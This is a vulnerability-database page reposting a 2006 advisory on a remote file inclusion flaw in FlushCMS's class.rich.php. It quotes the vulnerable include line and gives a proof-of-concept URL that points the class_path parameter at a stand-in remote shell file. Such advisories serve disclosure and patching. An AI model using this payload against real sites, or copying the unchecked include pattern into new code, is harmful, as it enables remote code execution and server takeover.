Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability

πŸ—“οΈΒ 16 Jul 2006Β 00:00:00Reported byΒ igiTypeΒ 
zdt
Β zdtπŸ”—Β 0day.todayπŸ‘Β 11Β Views

FlushCMS 1.0.0-pre2 Remote Inclusion Vulnerability in class.rich.ph

Show more
Code
======================================================================
FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability
======================================================================



flushcms  (tpath) Remote File Inclusion Vulnerability

virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact  :  [emailΒ protected]
for all member  virangar

bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------

simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?



#  0day.today [2018-01-08]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Jul 2006 00:00Current
7.1High risk
Vulners AI Score7.1
flushcmsremote inclusion vulnerabilityclass.rich.phpsecurityfile inclusiondiscoveryvirangar security team
11
.json
Report